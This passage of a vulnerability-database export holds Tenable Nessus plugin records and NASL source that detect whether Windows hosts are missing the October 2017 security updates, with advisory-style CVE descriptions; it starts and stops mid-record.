kb:\"4041671\", session:the_session);\n\n# 4041944\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"ntfs_31bf3856ad364e35\", file_pat:\"^ntfs\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24201'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4041944\", session:the_session);\n\n# 4041995\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"smbserver-common_31bf3856ad364e35\", file_pat:\"^srvnet\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24201'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4041995\", session:the_session);\n\n# 4042067\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"c..ent-indexing-common_31bf3856ad364e35\", file_pat:\"^query\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24201'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4042067\", session:the_session);\n\n# 4042120\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"win32k_31bf3856ad364e35\", file_pat:\"^win32k\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24200'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4042120\", session:the_session);\n\n# 4042121\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"gdi32_31bf3856ad364e35\", file_pat:\"^gdi32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24200'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4042121\", session:the_session);\n\n# 4050795 (fix for 4042007)\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"m..components-jetexcel_31bf3856ad364e35\", file_pat:\"^msexcl40\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('4.0.9801.2'),\n max_versions:make_list('4.0.9801.9999'),\n bulletin:bulletin,\n kb:\"4050795\", session:the_session);\n\n# 4042122\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"font-embedding_31bf3856ad364e35\", file_pat:\"^t2embed\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24200'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4042122\", session:the_session);\n\n# 4042050\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"mponents-jetintlerr_31bf3856ad364e35\", file_pat:\"^msjint40\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('4.0.9801.1'),\n max_versions:make_list('4.0.9801.9999'),\n bulletin:bulletin,\n kb:\"4042050\", session:the_session);\n\n# The following two checks are commented out\n# due to released patches failing to apply\n# to relavant systems.\n## 4042123\n#files = list_dir(basedir:winsxs, level:0, dir_pat:\"t..icesframework-msctf_31bf3856ad364e35\", file_pat:\"^msctf\\.dll$\", max_recurse:1);\n#vuln += hotfix_check_winsxs(os:'6.0',\n# sp:2,\n# files:files,\n# versions:make_list('6.0.6002.16386', '6.0.6002.24202'),\n# max_versions:make_list('6.0.6002.20000', '6.0.6002.99999'),\n# bulletin:bulletin,\n# kb:\"4042123\", session:the_session);\n#\n## 4042723\n#files = list_dir(basedir:winsxs, level:0, dir_pat:\"wlansvc_31bf3856ad364e35\", file_pat:\"^wlanapi\\.dll$\", max_recurse:1);\n#vuln += hotfix_check_winsxs(os:'6.0',\n# sp:2,\n# files:files,\n# versions:make_list('6.0.6001.18000', '6.0.6002.24202'),\n# max_versions:make_list('6.0.6001.20000', '6.0.6002.99999'),\n# bulletin:bulletin,\n# kb:\"4042723\", session:the_session);\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:18:16", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4041687\nor cumulative update 4041693. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory\n via the Microsoft Windows Text Services Framework. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8727)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11783)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - An Security Feature bypass vulnerability exists in\n Microsoft Windows storage when it fails to validate an\n integrity-level check. An attacker who successfully\n exploited the vulnerability could allow an application\n with a certain integrity level to execute code at a\n different integrity level. The update addresses the\n vulnerability by correcting how Microsoft storage\n validates an integrity-level check. (CVE-2017-11818)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - A remote code execution vulnerability\n exists in Windows Domain Name System (DNS) DNSAPI.dll\n when it fails to properly handle DNS responses. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code in the context of the Local\n System Account. (CVE-2017-11779)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS17_OCT_4041693.NASL", "href": "https://www.tenable.com/plugins/nessus/103750", "published": "2017-10-10T00:00:00", "title": "Windows 8.1 and Windows Server 2012 R2 October 2017 Security Updates (KRACK)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103750);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-8689\",\n \"CVE-2017-8694\",\n \"CVE-2017-8717\",\n \"CVE-2017-8718\",\n \"CVE-2017-8727\",\n \"CVE-2017-11762\",\n \"CVE-2017-11763\",\n \"CVE-2017-11765\",\n \"CVE-2017-11771\",\n \"CVE-2017-11772\",\n \"CVE-2017-11779\",\n \"CVE-2017-11780\",\n \"CVE-2017-11781\",\n \"CVE-2017-11783\",\n \"CVE-2017-11784\",\n \"CVE-2017-11785\",\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11813\",\n \"CVE-2017-11814\",\n \"CVE-2017-11815\",\n \"CVE-2017-11816\",\n \"CVE-2017-11817\",\n \"CVE-2017-11818\",\n \"CVE-2017-11822\",\n \"CVE-2017-11824\",\n \"CVE-2017-13080\"\n );\n script_bugtraq_id(\n 101077,\n 101081,\n 101083,\n 101093,\n 101094,\n 101095,\n 101099,\n 101100,\n 101101,\n 101108,\n 101109,\n 101110,\n 101111,\n 101114,\n 101116,\n 101122,\n 101128,\n 101136,\n 101140,\n 101141,\n 101142,\n 101144,\n 101147,\n 101149,\n 101161,\n 101162,\n 101166,\n 101274\n );\n script_xref(name:\"MSKB\", value:\"4041687\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n script_xref(name:\"MSKB\", value:\"4041693\");\n script_xref(name:\"MSFT\", value:\"MS17-4041687\");\n script_xref(name:\"MSFT\", value:\"MS17-4041693\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 October 2017 Security Updates (KRACK)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4041687\nor cumulative update 4041693. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory\n via the Microsoft Windows Text Services Framework. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8727)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11783)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - An Security Feature bypass vulnerability exists in\n Microsoft Windows storage when it fails to validate an\n integrity-level check. An attacker who successfully\n exploited the vulnerability could allow an application\n with a certain integrity level to execute code at a\n different integrity level. The update addresses the\n vulnerability by correcting how Microsoft storage\n validates an integrity-level check. (CVE-2017-11818)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - A remote code execution vulnerability\n exists in Windows Domain Name System (DNS) DNSAPI.dll\n when it fails to properly handle DNS responses. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code in the context of the Local\n System Account. (CVE-2017-11779)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)\");\n # https://support.microsoft.com/en-us/help/4041687/windows-81-update-kb4041687\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1c67d5c\");\n # https://support.microsoft.com/en-us/help/4041693/windows-81-update-kb4041693\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c3325f2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4041687 or Cumulative update KB4041693.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11771\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-10\";\nkbs = make_list('4041687', '4041693');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"10_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4041687, 4041693])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:18:15", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4041679\nor cumulative update 4041690. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory\n via the Microsoft Windows Text Services Framework. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8727)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - A remote code execution vulnerability\n exists in Windows Domain Name System (DNS) DNSAPI.dll\n when it fails to properly handle DNS responses. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code in the context of the Local\n System Account. (CVE-2017-11779)\n\n - An Security Feature bypass vulnerability exists in\n Microsoft Windows storage when it fails to validate an\n integrity-level check. An attacker who successfully\n exploited the vulnerability could allow an application\n with a certain integrity level to execute code at a\n different integrity level. The update addresses the\n vulnerability by correcting how Microsoft storage\n validates an integrity-level check. (CVE-2017-11818)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS17_OCT_4041690.NASL", "href": "https://www.tenable.com/plugins/nessus/103748", "published": "2017-10-10T00:00:00", "title": "Windows Server 2012 October 2017 Security Updates (KRACK)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103748);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-8694\",\n \"CVE-2017-8717\",\n \"CVE-2017-8718\",\n \"CVE-2017-8727\",\n \"CVE-2017-11762\",\n \"CVE-2017-11763\",\n \"CVE-2017-11765\",\n \"CVE-2017-11771\",\n \"CVE-2017-11772\",\n \"CVE-2017-11779\",\n \"CVE-2017-11780\",\n \"CVE-2017-11781\",\n \"CVE-2017-11784\",\n \"CVE-2017-11785\",\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11814\",\n \"CVE-2017-11815\",\n \"CVE-2017-11816\",\n \"CVE-2017-11817\",\n \"CVE-2017-11818\",\n \"CVE-2017-11824\",\n \"CVE-2017-13080\"\n );\n script_bugtraq_id(\n 101077,\n 101081,\n 101093,\n 101094,\n 101095,\n 101099,\n 101100,\n 101101,\n 101108,\n 101109,\n 101110,\n 101111,\n 101114,\n 101116,\n 101136,\n 101140,\n 101141,\n 101142,\n 101147,\n 101149,\n 101161,\n 101162,\n 101166,\n 101274\n );\n script_xref(name:\"MSKB\", value:\"4041690\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n script_xref(name:\"MSKB\", value:\"4041679\");\n script_xref(name:\"MSFT\", value:\"MS17-4041690\");\n script_xref(name:\"MSFT\", value:\"MS17-4041679\");\n\n script_name(english:\"Windows Server 2012 October 2017 Security Updates (KRACK)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4041679\nor cumulative update 4041690. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory\n via the Microsoft Windows Text Services Framework. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8727)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8694)\n\n - A 